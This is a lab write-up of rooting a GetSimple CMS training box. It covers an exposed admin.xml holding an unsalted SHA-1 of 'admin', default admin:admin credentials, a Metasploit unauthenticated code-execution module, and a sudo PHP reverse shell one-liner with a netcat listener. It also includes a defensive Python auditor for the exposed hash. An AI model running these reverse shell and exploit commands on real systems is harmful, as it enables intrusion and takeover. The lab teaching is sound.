Academy
Personal Rating: Easy
For this Starting Point box I do not have much documentation.
At http://10.129.70.149/data/users/admin.xml there was some interesting information to be found:
<item>
<USR>admin</USR>
<NAME/>
<PWD>d033e22ae348aeb5660fc2140aec35850c4da997</PWD>
<EMAIL>admin@gettingstarted.com</EMAIL>
<HTMLEDITOR>1</HTMLEDITOR>
<TIMEZONE/>
<LANG>en_US</LANG>
</item>
I could also log into http://10.129.70.149/admin/settings.php with the very easy-to-guess credentials admin:admin.
SSH with either of the two credential sets did not work.
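For the site owner's side of this finding, here is an added example (not part of the original write-up) that parses a user record in the format shown above and flags a `PWD` value stored as a bare SHA-1 digest of a default password. The function name `audit_user_record` and the `DEFAULT_PASSWORDS` list are assumptions made for illustration.

```python
import hashlib
import re
import xml.etree.ElementTree as ET

# Constructed sample: the record shown above, as it would sit in data/users/admin.xml.
SAMPLE_USER_XML = """<item>
<USR>admin</USR>
<NAME/>
<PWD>d033e22ae348aeb5660fc2140aec35850c4da997</PWD>
<EMAIL>admin@gettingstarted.com</EMAIL>
<HTMLEDITOR>1</HTMLEDITOR>
<TIMEZONE/>
<LANG>en_US</LANG>
</item>"""

# Assumption: a short list of defaults to rule out; extend it with your own policy list.
DEFAULT_PASSWORDS = ["admin", "password", "changeme", "123456"]

# 40 lowercase hex characters: the length of a SHA-1 digest, with no salt or cost prefix.
BARE_SHA1 = re.compile(r"[0-9a-f]{40}")


def audit_user_record(xml_text, candidates=DEFAULT_PASSWORDS):
    """Return a list of findings for one <item> user record."""
    item = ET.fromstring(xml_text)
    user = (item.findtext("USR") or "").strip()
    pwd = (item.findtext("PWD") or "").strip().lower()
    if not pwd:
        return [f"{user}: empty PWD field"]
    findings = []
    if BARE_SHA1.fullmatch(pwd):
        findings.append(f"{user}: PWD looks like a bare SHA-1 digest (no salt, no work factor)")
        # The username itself is the first default worth ruling out.
        for guess in dict.fromkeys([user, *candidates]):
            if hashlib.sha1(guess.encode()).hexdigest() == pwd:
                findings.append(f"{user}: PWD is the unsalted SHA-1 of a default password")
                break
    return findings


if __name__ == "__main__":
    for finding in audit_user_record(SAMPLE_USER_XML):
        print("FINDING", finding)
```

Either finding means the account password should be rotated, and the `data/users/` directory should not be readable over HTTP.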
From the other information I had about the page and webserver I used searchsploit to find a likely vulnerability. This module worked to get a meterpreter shell: exploit/multi/http/getsimplecms_unauth_code_exec
With that I could get a user shell as www-data.
sudo -l showed me that php could be executed as admin from the www-data user (SUID binary), so I used this PHP reverse shell:
sudo php -r '$sock=fsockopen("10.10.15.13",4488);exec("/bin/sh -i <&3 >&3 2>&3");'
(with sudo nc -lnvp 4488 on my host)
With that I already had a working shell on the box as root.